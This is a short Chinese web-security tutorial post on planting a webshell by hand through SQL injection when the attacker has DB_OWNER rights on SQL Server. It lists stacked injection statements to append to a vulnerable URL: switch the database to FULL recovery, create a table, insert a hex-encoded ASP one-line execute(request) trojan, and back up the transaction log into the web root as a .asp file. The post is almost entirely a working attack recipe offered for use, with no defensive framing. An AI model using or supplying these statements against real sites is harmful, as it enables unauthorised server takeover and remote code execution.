DB_OWNER权限手工备份shell - 网站安全 - 自学php

有时候利用啊D或者NBSI或者getshell等工具来弄当然很方便，但也有时候工具卡壳，那就用到手工了，做下笔记

一下语句使用在注射url的后面。

‘;alter database 库名 set RECOVERY FULL– ‘;create table cmd (a image)– ‘;backup log qledu to disk = ‘e:\cmd’ with init– ‘;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)– ‘;backup log qledu to disk = ‘e:\webroot\shandongedu\1437.asp’– 这些就是备分的命令了，记住库名的地方要写上使用啊D弄出来的 数据库 名，这样才可以成功。

然后就是一句一句的执行了。

0x3C25657865637574652872657175657374282261222929253EDA这个 是LAKE2的一句话木马16进制后的样子 备分路径那里要写你的一句话木马存放地址,好了，开始备分

 

查看更多关于DB_OWNER权限手工备份shell - 网站安全 - 自学php的详细内容...